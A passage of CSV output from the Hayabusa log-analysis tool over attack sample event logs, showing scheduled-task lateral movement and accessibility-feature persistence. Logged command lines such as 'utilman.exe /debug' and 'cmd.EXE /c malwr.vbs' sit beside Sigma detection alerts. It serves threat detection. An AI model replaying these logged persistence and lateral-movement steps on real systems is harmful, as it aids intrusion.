10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: 